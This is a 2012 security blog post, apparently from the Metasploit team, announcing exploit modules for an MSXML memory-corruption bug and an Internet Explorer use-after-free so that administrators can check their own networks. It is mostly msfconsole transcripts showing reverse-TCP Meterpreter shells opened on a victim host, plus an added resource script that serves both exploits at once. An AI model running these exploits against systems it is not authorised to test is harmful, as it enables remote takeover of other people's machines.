We've been noticing a lot of exploit activity against Microsoft vulnerabilities lately. We decided to look into some of these attacks and released two modules, for CVE-2012-1889 and CVE-2012-1875, within a week of the vulnerabilities' publication so that our users can test their systems. Both are very important to any organization using Windows: one is a newly patched bug, while the other is still a zero-day. To test whether any systems on your network are vulnerable, you can download the latest version of Metasploit for free.

 

CVE-2012-1889: MSXML Uninitialized Memory Corruption

 

This is an uninitialized memory bug in MSXML. According to Microsoft, the component can be loaded from either Internet Explorer or Microsoft Office. This vulnerability is rumored to be "state-sponsored", and what makes it really critical is that it is still a 0-day and is being used to hijack Gmail accounts. That's right: if you use Gmail together with Internet Explorer or Microsoft Office, you're at risk. We expect this vulnerability to become even more dangerous, since there is no patch and it is rather easy to trigger. Microsoft has published a temporary mitigation that disables the component along with other config tweaks, but that obviously has its limitations. Your best bet may be to use a different browser such as Google Chrome until an official patch is available; note that switching browsers only covers the Internet Explorer vector, not documents opened in Microsoft Office.

 

Jun 19th, 2012 Update: This module now works for IE6/7/8/9, Windows XP, Vista, and all the way to Windows 7 SP1.

July 10th, 2012 Update: Patch is now available.

 

Here's how you can check with Metasploit whether any systems on your network are vulnerable, which is very likely while no patch is available. The module starts a browser exploit server; point a test client running Internet Explorer at the "Local IP" URL it prints (not the 0.0.0.0 one), and if a Meterpreter session opens, that host is vulnerable:

 

msf > use exploit/windows/browser/msxml_get_definition_code_exec
msf  exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(msxml_get_definition_code_exec) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf  exploit(msxml_get_definition_code_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.3:4444
[*] Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb
msf  exploit(msxml_get_definition_code_exec) >
[*]  Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb
[*] Server started.
[*] 10.0.1.79        msxml_get_definition_code_exec - Using msvcrt ROP
[*] 10.0.1.79        msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.79:1565) at 2012-06-18 14:07:38 -0500
[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2856)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2356
[+] Successfully migrated to process

 

CVE-2012-1875: Internet Explorer Same ID Use-After-Free

 

This is a vulnerability in the way Internet Explorer handles elements that share the same ID property: a deleted object is accessed after it has been freed, resulting in remote code execution. It has been exploited in the wild, possibly originating from Hong Kong. According to AlienVault Labs, the command-and-control (C&C) server is still active at the time of this writing. The Metasploit module shares some similarities with the exploit found in the wild: both bypass DEP/ASLR, both use msvcr71.dll, and both target common systems such as Windows XP and Windows 7. Multiple anti-virus vendors already have a quick check for this exploit. However, AV signatures cannot patch the bug, so we still recommend trying the Metasploit module to verify whether you are indeed vulnerable.

 

To use this module, simply do the following:

 

msf > use exploit/windows/browser/ms12_037_same_id
msf  exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms12_037_same_id) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf  exploit(ms12_037_same_id) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.3:4444
[*] Using URL: http://0.0.0.0:8080/gTHJEKBboMi
[*]  Local IP: http://10.0.1.3:8080/gTHJEKBboMi
[*] Server started.
msf  exploit(ms12_037_same_id) >
[*] 10.0.1.79        ms12_037_same_id - Client requesting: /gTHJEKBboMi
[*] 10.0.1.79        ms12_037_same_id - Using msvcrt ROP
[*] 10.0.1.79        ms12_037_same_id - Sending html
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.79:1685) at 2012-06-18 13:42:49 -0500
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3916)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1680
[+] Successfully migrated to process
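As an added example (not part of the original post or of the modules themselves), the two manual sessions above can be driven from a single msfconsole resource script so that both modules are served at the same time. It assumes the attacker host 10.0.1.3 from the transcripts; the second module is moved to SRVPORT 8081 and LPORT 4445 so that its web server and handler do not collide with the first, and the URIPATH values are arbitrary choices of ours rather than anything the modules generate:

```text
# check_ie_bugs.rc -- run with: msfconsole -r check_ie_bugs.rc
# Attacker host 10.0.1.3 is taken from the transcripts above; ports and
# URI paths below are our own choices.

# Module 1: MSXML uninitialized memory corruption (CVE-2012-1889)
use exploit/windows/browser/msxml_get_definition_code_exec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.3
set LPORT 4444
set SRVHOST 10.0.1.3
set SRVPORT 8080
set URIPATH /msxml
exploit -j

# Module 2: Internet Explorer same ID use-after-free (CVE-2012-1875 / MS12-037)
# Different SRVPORT and LPORT so it can run alongside module 1.
use exploit/windows/browser/ms12_037_same_id
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.3
set LPORT 4445
set SRVHOST 10.0.1.3
set SRVPORT 8081
set URIPATH /sameid
exploit -j

# Browse from each test client to http://10.0.1.3:8080/msxml and
# http://10.0.1.3:8081/sameid, then list the hosts that were exploited.
sessions -l
```

Setting SRVHOST to the real interface address makes the module print the reachable URL directly instead of 0.0.0.0. Both modules are browser exploits, so a session only proves that the client which visited the URL is vulnerable; hosts that never browse to it are not assessed, and a host that returns no session for the MSXML test but does for the same-ID test (or vice versa) should be treated as two separate findings.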

 

If you have any questions, let us know in the comments section.  To obtain the latest version of Metasploit for free, please go to: http://www.metasploit.com/download/